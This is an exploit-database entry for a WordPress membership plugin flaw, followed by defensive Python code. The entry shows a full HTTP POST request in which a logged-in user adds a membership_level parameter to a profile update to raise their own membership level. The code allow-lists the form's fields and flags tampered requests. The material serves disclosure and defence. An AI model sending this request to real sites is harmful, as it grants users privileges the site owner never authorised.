## https://sploitus.com/exploit?id=WPEX-ID:724729D9-1C4A-485C-9C90-A27664C47C84
To raise their own membership level, the attacker adds the membership_level parameter to the POST request that is sent when updating the profile.

```
POST /membership-login/membership-profile/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: [logged in user with membership level 2]

swpm_profile_edit_nonce_val=1c449c7f1a&_wp_http_referer=%2Fmembership-login%2Fmembership-profile%2F&email=user%40localhost.localhost&password=&password_re=&first_name=user_low&last_name=user_low&phone=&address_street=123&address_city=1234&address_state=123&address_zipcode=&country=&company_name=&swpm_editprofile_submit=Update&action=custom_posts&membership_level=3
```
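The control that is missing here is an allow-list over the profile form's fields. The following is an added example, not code from the plugin or from the original page: it splits a form-encoded profile update into accepted and rejected fields, so the same logic can filter input before the update or flag requests in logs. The field set and path are assumptions taken from the request above, and the function names are hypothetical.

```python
from urllib.parse import parse_qsl

# Assumption: the fields the profile form itself submits, taken from the
# request shown above with membership_level left out.
PROFILE_FIELDS = frozenset({
    "swpm_profile_edit_nonce_val", "_wp_http_referer", "email", "password",
    "password_re", "first_name", "last_name", "phone", "address_street",
    "address_city", "address_state", "address_zipcode", "country",
    "company_name", "swpm_editprofile_submit", "action",
})

# Assumption: the profile page path as it appears in the request above.
PROFILE_PATH = "/membership-login/membership-profile/"


def split_profile_update(body):
    """Return (accepted, rejected) for a form-encoded profile update body.

    accepted maps each allow-listed field to its first value; rejected maps
    every other name (and any repeated allow-listed name) to its values.
    """
    accepted, rejected = {}, {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in PROFILE_FIELDS and name not in accepted:
            accepted[name] = value
        else:
            rejected.setdefault(name, []).append(value)
    return accepted, rejected


def review_request(method, path, body):
    """Return findings for one logged request; an empty list means none."""
    if method != "POST" or path != PROFILE_PATH:
        return []
    _, rejected = split_profile_update(body)
    return [f"unexpected profile field {name!r}={value!r}"
            for name, values in sorted(rejected.items()) for value in values]


# Constructed sample bodies (shortened; the nonce value is a placeholder).
SAMPLE_NORMAL = ("swpm_profile_edit_nonce_val=0000000000"
                 "&email=user%40localhost.localhost&first_name=user_low"
                 "&swpm_editprofile_submit=Update")
SAMPLE_TAMPERED = SAMPLE_NORMAL + "&membership_level=3"

if __name__ == "__main__":
    for sample in (SAMPLE_NORMAL, SAMPLE_TAMPERED):
        print(review_request("POST", PROFILE_PATH, sample))
```

Only the accepted dictionary should reach the code that writes the member record; the membership level itself should be changed only through an administrator-authorised path.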